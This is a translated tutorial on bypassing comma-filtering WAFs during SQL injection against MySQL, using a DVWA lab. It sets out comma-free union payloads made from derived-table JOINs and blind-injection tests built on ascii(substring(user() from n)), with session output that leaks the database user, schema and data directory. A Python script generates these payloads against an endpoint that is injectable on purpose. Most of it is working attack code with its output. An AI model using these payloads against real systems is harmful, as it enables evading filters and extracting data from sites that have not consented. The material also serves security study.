SQL injection techniques: bypassing comma filtering in union-based (visible) and blind injection
Preface
SQL injection was once an extremely common vulnerability. As security practices improved it became much rarer, but even today many sites are still running with SQL injection bugs. This article covers bypassing comma filtering in SQL injection; it is shared here for reference and study. Without further ado, here are the details.
1. Bypassing the comma in union-based (visible) injection
In a union query, a probe of the form UNION SELECT 1,2,3,4,5,6,7..n is used to find the display positions. That statement contains many commas, so if a WAF blocks commas, the union query can no longer be used.
Bypass
Rewrite the probe as a JOIN of one-column derived tables. A JOIN with no ON condition is a cross join, so the single-row subqueries (select 1), (select 2), (select 3) are placed side by side and produce the same one row with n columns, without a single comma in the injected text. Any display position can then be replaced with the usual injection expression or another subquery:
union select 1,2,3;
union select * from ((select 1)A join (select 2)B join (select 3)C);
union select * from ((select 1)A join (select 2)B join (select group_concat(user(),'',database(),'',@@datadir))C);
Demonstrating the union query in the database
Everything from UNION onward is what we would inject in the URL; it is shown here only for demonstration. In practice, if the injected statement contains a comma it may be blocked.
mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)
With no comma: injecting with JOIN
mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
Querying the data we actually want
mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),'',database(),'',@@datadir))C);
+---------+-------+-------------------------------------------------+
| user_id | user  | password                                        |
+---------+-------+-------------------------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99                |
|       1 | 2     | root@192.168.228.1dvwac:\phpStudy\MySQL\data\   |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)
With the empty-string separators used here, the three values are simply run together in the output: root@192.168.228.1, dvwa and c:\phpStudy\MySQL\data\. Note that this final group_concat() call itself contains commas between its arguments, so a WAF that really blocks every comma would stop it too. By default (without the PIPES_AS_CONCAT SQL mode) MySQL has no comma-free concatenation operator, so the way to keep the whole payload comma-free is to give each expression its own derived table, for example (select user())B join (select database())C, and read each value from its own display position.
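The following Python script is an added example, not code from the article. It reproduces the comma-free JOIN trick end to end and generalises it to n display positions: a hypothetical WAF rule that rejects any input containing a comma, a deliberately injectable lookup, and a generator that turns a column list into the derived-table JOIN form. The users table, its two rows and the function names (vulnerable_lookup, join_select, commaless_union) are all constructed for the demo, and an in-memory SQLite database stands in for MySQL (SQLite accepts the same derived-table JOIN shape but has no user() or database(), so the leak expression is a single-argument group_concat of the usernames instead).

```python
import sqlite3

# Constructed sample rows standing in for the article's DVWA-style users table.
SAMPLE_ROWS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "e99a18c4428cb38d5f260853678922e03"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL server in the article
    (assumption: SQLite accepts the same derived-table JOIN shape)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(user_id integer, user text, password text)")
    con.executemany("insert into users values(?,?,?)", SAMPLE_ROWS)
    return con


def waf_blocks(user_input):
    """Hypothetical WAF rule from the article: reject any input containing a comma."""
    return "," in user_input


def vulnerable_lookup(con, user_id_param):
    """Deliberately injectable endpoint: the parameter is pasted into the SQL text.
    The query's own commas are not inspected; only the user-supplied part is."""
    if waf_blocks(user_id_param):
        raise PermissionError("blocked by WAF: comma in input")
    sql = "select user_id, user, password from users where user_id = " + user_id_param
    return con.execute(sql).fetchall()


def join_select(columns):
    """Build 'select * from ((select c1) t0 join (select c2) t1 ...)'.
    Each column is its own one-column derived table; a JOIN with no ON clause is a
    cross join, so the single rows line up side by side into one n-column row.
    No comma appears anywhere in the result."""
    parts = ["(select %s) t%d" % (expr, i) for i, expr in enumerate(columns)]
    return "select * from (" + " join ".join(parts) + ")"


def comma_union(ncols):
    """The textbook probe, which a comma-blocking WAF stops."""
    return "1 union select " + ",".join(str(i + 1) for i in range(ncols))


def commaless_union(ncols, leak_expr=None, position=None):
    """Comma-free equivalent; optionally put a leak expression at a display position."""
    cols = [str(i + 1) for i in range(ncols)]
    if leak_expr is not None:
        cols[position - 1] = leak_expr
    return "1 union " + join_select(cols)


def demo():
    con = make_db()
    out = {}
    try:
        vulnerable_lookup(con, comma_union(3))
        out["comma_union"] = "allowed"
    except PermissionError:
        out["comma_union"] = "blocked"
    # Same three display positions, but nothing in the input is a comma.
    out["join_union"] = vulnerable_lookup(con, commaless_union(3))
    # Display position 3 now carries a comma-free aggregate (single-argument
    # group_concat); SQLite has no user()/database(), so leak usernames instead.
    leak = "(select group_concat(user) from users)"
    out["leak"] = vulnerable_lookup(con, commaless_union(3, leak, 3))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Running it shows the comma probe rejected, the JOIN form returning the same (1, 2, 3) marker row as the article's MySQL session, and the usernames landing in display position 3 even though the injected text never contained a comma (the commas in the leaked output come from group_concat's default separator on the server side, which the WAF never sees).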
2. Bypassing the comma in blind injection
The MID() and SUBSTR() functions extract characters from a text field: mid(str, pos, len) returns len characters starting at the 1-based position pos.
mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro              |
+-----------------+
1 row in set (0.04 sec)
Getting the ASCII code of the first character of the database user name. ascii() only looks at the leftmost character of its argument, so ascii(mid(user(),1,2)) is the code of 'r' (114) even though mid() returned two characters.
mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|     114 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)
Blind injection: guessing the ASCII value. The condition is appended to user_id=1, and the row comes back only when the guess is right:
mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115);
Empty set
mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)
Bypassing the comma with the SUBSTRING function
substring(str FROM pos)
returns the substring of str starting at position pos. The FROM keyword replaces the comma, and because ascii() only reads the first character, the tail starting at pos is all that is needed to test the character at position pos.
mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello                     |
+---------------------------+
1 row in set (0.04 sec)
mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello                      |
+---------------------------+
1 row in set (0.03 sec)
Injection
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114);
Empty set
substring(user() from 2) starts with 'o', and the ASCII code of 'o' is 111:
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)
Summary
That is all for this article. I hope it is of some use for your study or work; if you have questions, leave a comment. Thank you for supporting 毛票票.